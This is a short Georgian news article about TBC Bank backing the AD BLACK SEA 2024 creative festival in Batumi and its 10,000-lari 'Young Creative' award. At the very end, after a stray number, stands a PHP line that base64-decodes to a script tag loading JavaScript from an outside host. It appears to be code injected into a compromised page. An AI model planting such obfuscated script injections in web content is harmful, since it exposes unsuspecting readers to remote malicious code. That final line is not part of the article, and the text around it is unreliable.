celsiusi
ავერსი შნაიდერი

 „თიბისის“ მხარდაჭერით, 12-14 სექტემბერს, ბათუმში საერთაშორისო შემოქმედებითი ფესტივალი AD BLACK SEA 2024 ტარდება.

ამის შესახებ ინფორმაციას „თიბისი“ ბანკი ავრცელებს.

მათი ცნობით, ფესტივალზე „თიბისი“, როგორც ახალი თაობის მხარდამჭერი, წარადგენს ნომინაციას Young Creative და წლის ყველაზე შემოქმედებითი ახალგაზრდა გამოვლინდება.

„გამარჯვებულს სპეციალურად შერჩეული ადგილობრივი ჟიური შეაფასებს. „თიბისი“, როგორც ნომინაციის წარმდგენი, გამარჯვებულისთვის 10 000 ლარს გამოყოფს, რომლის ფარგლებშიც, ახალგაზრდა შემოქმედს შეეძლება თავისი ინტერესების შესაბამისად გამოიყენოს თანხა შემოქმედებითი კარიერის განსავითარებლად.

"თიბისი" და AD BLACK SEA ფესტივალის დაარსებიდან, 2015 წლიდან პარტნიორები არიან. "თიბისისთვის", როგორც ბრენდისთვის, შემოქმედებითი ინდუსტრიის მხარდაჭერა და მისი განვითარება ერთ-ერთი მნიშვნელოვანი მიმართულებაა. AD BLACK SEA უკვე მერვე წელია იმართება ბათუმში, სადაც ევროპის და აზიის ქვეყნების წარმომადგენლები ერთმანეთს ცოდნასა და გამოცდილებას უზიარებენ.. პროგრამა მოიცავს სხვადასხვა ლექცია-სემინარს, პანელურ დისკუსიასა და ვორკშოპს, რომლებსაც სფეროს წამყვანი ადგილობრივი და უცხოელი პროფესიონალები უძღვებიან.

Young Creative -ის ნომინაციაში განცხადებების მიღება დასრულებულია. გამარჯვებული 14 სექტემბერს, AD BLACK SEA-ის დასკვნით დაჯილდოებაზე, მთავარ სცენაზე გამოვლინდება“, - ნათქვამია ინფორმაციაში.

103
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");